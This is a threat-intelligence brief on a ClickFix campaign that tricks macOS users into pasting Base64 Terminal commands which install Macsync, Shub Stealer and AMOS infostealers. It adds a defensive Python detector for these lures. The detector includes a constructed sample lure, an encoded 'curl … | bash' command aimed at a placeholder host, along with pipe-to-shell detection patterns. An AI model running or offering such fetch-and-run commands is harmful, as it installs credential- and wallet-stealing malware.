ClickFix campaign expands to macOS — Macsync, Shub Stealer and AMOS delivered via Base64 Terminal commands that bypass Gatekeeper
From CTI Daily Brief — 2026-05-10 · published 2026-05-10
Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users via fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes — Shub Stealer earlier wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell payload directly to bash, bypassing Gatekeeper because no signed application bundle is ever launched. Per Microsoft, three distinct infostealers — Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer) — are delivered across the campaign's variants, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants instead substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists, with Telegram as fallback C2.
ATT&CK mapping: T1204.002 User Execution: Malicious File, T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert when Terminal spawns curl / wget immediately followed by pipe-to-shell execution from a non-developer profile; alert on LaunchAgent file-creation events originating outside /Applications or /Library/Application Support/<vendor> paths; alert on anomalous Keychain API calls from processes without UI entitlements (Endpoint Security framework ES_EVENT_TYPE_NOTIFY_OPENSSH-style hooks expose this on EDR-instrumented Macs).
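One way to turn the first two detection concepts above into a rule, as an added example that is not from Microsoft's or this brief's material: it decodes Base64 tokens found in a Terminal-spawned shell command line before looking for curl / wget piped into a shell, and it flags launchd plist creation by a process whose image lives outside the trusted installer paths. The event schema, the placeholder host and the sample events are constructed for this example; the Keychain API concept is not covered here.

```python
import base64
import re
from dataclasses import dataclass

# Constructed event records in the shape an EDR might flatten Endpoint Security
# exec / file-create notifications into; the field names are an assumption, not a vendor schema.
@dataclass
class Event:
    kind: str     # "exec" or "file_create"
    parent: str   # parent process name
    image: str    # executable path of the process performing the action
    target: str   # exec: recorded command line; file_create: created path
    profile: str  # "developer" or "standard" user profile

SHELLS = {"bash", "sh", "zsh"}
FETCH = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(bash|sh|zsh)\b")
TRUSTED_WRITER_PREFIXES = ("/Applications/", "/Library/Application Support/")  # expected plist writers
def decode_b64_tokens(cmdline: str) -> list[str]:
    """Decode Base64-looking tokens so 'echo <b64> | base64 -d | bash' is inspected as plain text."""
    decoded = []
    for tok in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", cmdline):
        try:
            decoded.append(base64.b64decode(tok, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue  # not valid Base64; ignore the token
    return decoded

def check_event(ev: Event) -> list[str]:
    """Return alert strings for one event; empty list when nothing matched."""
    alerts = []
    if ev.kind == "exec" and ev.parent == "Terminal" and ev.image.rsplit("/", 1)[-1] in SHELLS:
        for text in [ev.target] + decode_b64_tokens(ev.target):  # literal and decoded views
            if FETCH.search(text) and PIPE_TO_SHELL.search(text):
                sev = "high" if ev.profile != "developer" else "medium"
                alerts.append(f"{sev}: Terminal shell pipes a download to a shell: {text!r}")
                break
    if (ev.kind == "file_create" and ev.target.endswith(".plist")
            and ("/LaunchAgents/" in ev.target or "/LaunchDaemons/" in ev.target)
            and not ev.image.startswith(TRUSTED_WRITER_PREFIXES)):
        alerts.append(f"high: launchd plist {ev.target} written by untrusted image {ev.image}")
    return alerts
# Constructed samples; the decoded lure points at a placeholder host.
LURE_B64 = base64.b64encode(b"curl -fsSL https://example.invalid/setup | bash").decode()
SAMPLE_EVENTS = [
    Event("exec", "Terminal", "/bin/bash", f"echo {LURE_B64} | base64 -d | bash", "standard"),
    Event("exec", "Terminal", "/bin/zsh", "brew install jq", "developer"),
    Event("file_create", "bash", "/bin/bash", "/Users/u/Library/LaunchAgents/com.upd.plist", "standard"),
    Event("file_create", "launchd", "/Applications/Vendor.app/Contents/MacOS/Vendor", "/Users/u/Library/LaunchAgents/com.vendor.helper.plist", "standard"),
]
```

Running `check_event` over `SAMPLE_EVENTS` raises two alerts: the decoded lure (high) and the plist written by `/bin/bash`; the brew command and the vendor-app plist stay silent.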